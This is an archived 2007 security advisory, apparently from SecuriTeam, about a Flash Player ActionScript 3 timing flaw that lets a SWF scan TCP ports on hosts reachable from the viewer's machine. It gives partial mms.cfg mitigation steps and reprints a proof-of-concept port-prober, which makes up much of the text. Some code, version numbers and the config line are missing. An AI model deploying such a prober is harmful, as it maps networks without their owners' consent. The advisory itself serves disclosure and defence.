HistoryDec 24, 2007 - 12:00 a.m.

[EXPL] Socket Connection Timing Can Reveal Information About Network Configuration (Exploit)






The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site:

Socket Connection Timing Can Reveal Information About Network
Configuration (Exploit)


Due to a design flaw in ActionScript 3 socket handling, compiled Flash
movies are able to scan for open TCP ports on any host reachable from the
host running the SWF, bypassing the Flash Player Security Sandbox Model
and without the need to rebind DNS.


Vulnerable Systems:

  • Flash Player version
  • Flash Player version
  • Flash Player version

The following instructions reference the mms.cfg configuration file. For
a general introduction to mms.cfg, see the Adobe Flash Player
Administration Guide.

To disable ActionScript socket functionality:

  1. Ensure that Flash Player, or later, is installed. Visit the
    Adobe Flash Player Download Center to obtain the latest version, or visit
    the Adobe Flash Product page to determine the version currently installed.

  2. Find the location of the file mms.cfg on your system(s). This file may
    already exist, or you may need to create it. You will most likely need
    administrative access to create or edit this file. mms.cfg is located at:

  • Windows: \Macromed\Flash\mms.cfg
    (e.g. C:\WINDOWS\system32\Macromed\Flash\mms.cfg)
  • Mac OS: /Library/Application Support/Macromedia/mms.cfg
  • Linux: /etc/adobe/mms.cfg
  1. Add the following line to mms.cfg:

CVE Information:


  • Flash 9 AS3 TCP-Portprober
  • this Actionscript Application was created to detect if a given TCP Port
    on a given host is reachable or not from the host the swf is running on
  • this application is totally bypassing the flash player security sandbox
    model / it actually uses the security model to probe a port
  • the application is based on a timing problem in the SecurityErrorEvent
    that Adobe introduced with AS3
  • the swf currently needs to be reloaded for every port because the
    SecurityPolicy state is cached in the player
  • javascript is used to implement the actual portscanner
  • the application will report closed ports for services that understand
    the "<policy-file-request/>"-XML this is a extremely rare case
  • @author David Neu <[email protected]>
  • @thx fukami, SektionEins GmbH - Web Security Auditing and Software
  • @usage embed in an html page and add the parameters host and port
  •     the application will check if the port is reachable from the 

host the swf runs on and then calls the javascript function "reportResult"
with the port number and the ports state (true or false)

public class Main extends flash.display.Sprite
// textField for status viewing
protected var tf:TextField;

// the socket that (tries) connects
protected var socket:Socket;

// timer for detecting not answering policy-requests
protected var timer:Timer;

// the host to probe
protected var host:String;

// the port to probe
protected var port:Number;

// Main Entry Point
public function Main():void
// setup status textfield
tf = new TextField();
tf.width = 600;
tf.height = 300;

// get port from parameters
port = parseInt(this.loaderInfo.parameters['port']);
if (isNaN(port)) {
port = 80;

// get host from parameters
host = this.loaderInfo.parameters['host'];
if (host == null) {
host = '';


// setup the timer
// if a port is closed an the flash plugin is not able to write the
"<policy-file-request/>"-XML to the socket it will immediately fire an
SecurityErrorEvent. If the SecurityErrorEvent is not fired within 2
seconds we assume that flash was able to write the xml to the socket an is
waiting for a reply -> the port is open. The timer can be reduced a lot to
make scanning even faster.
timer = new Timer(2000, 1);
timer.addEventListener(TimerEvent.TIMER, onTimer);
//tf.appendText('interface: '+ExternalInterface.available);
//'alert', 'test');

protected function probe():void
// show some info text
tf.appendText('probe host: '+host+' port: '+port);

// setup socket an event listeners
socket = new Socket();

// listen to the badly implemented security error

// listen to sucessfull connects (should in fact never happen)
socket.addEventListener(Event.CONNECT, onConnect);

// listen to IO Errors that will also never occur
socket.addEventListener(IOErrorEvent.IO_ERROR, onIOError);


// try to connect
socket.connect(host, port);


  • Called when the SecurityErrorEvent is Fired
  • when there is an SecurityErrorEvent before the timeout we assume the
    port is closed
  • @param e SecurityErrorEvent
  • @return void
    protected function onSecurityError(e:SecurityErrorEvent):void


  • Called when the Connect event is fired
  • when we can conect to a port it is definitely open
  • should only happen in very rare cases
  • @param e Event
  • @return void
    protected function onConnect(e:Event):void


  • when we get an IO Error the port is closed
  • as the connect event this will only happen in very rare cases
  • @param e
  • @return
    protected function onIOError(e:Event):void


  • when the flash plugin has waited too long for the reply to the Policy
    Request the Timer is fired
  • assume the port is open as flash was able to write the policy request
    to it
  • @param e TimerEvent
  • @return void
    protected function onTimer(e:TimerEvent):void


  • show that the port is open and report to the html-Page
  • @return void
    protected function portOpen():void
    tf.appendText('\nOPEN');'reportResult', port, "true");


  • show that the port is closed and report to the html page
  • @return void
    protected function portClosed():void
    timer.reset();'reportResult', port, "false");


The information has been provided by <mailto:[email protected]> David
The original article can be found at: <;


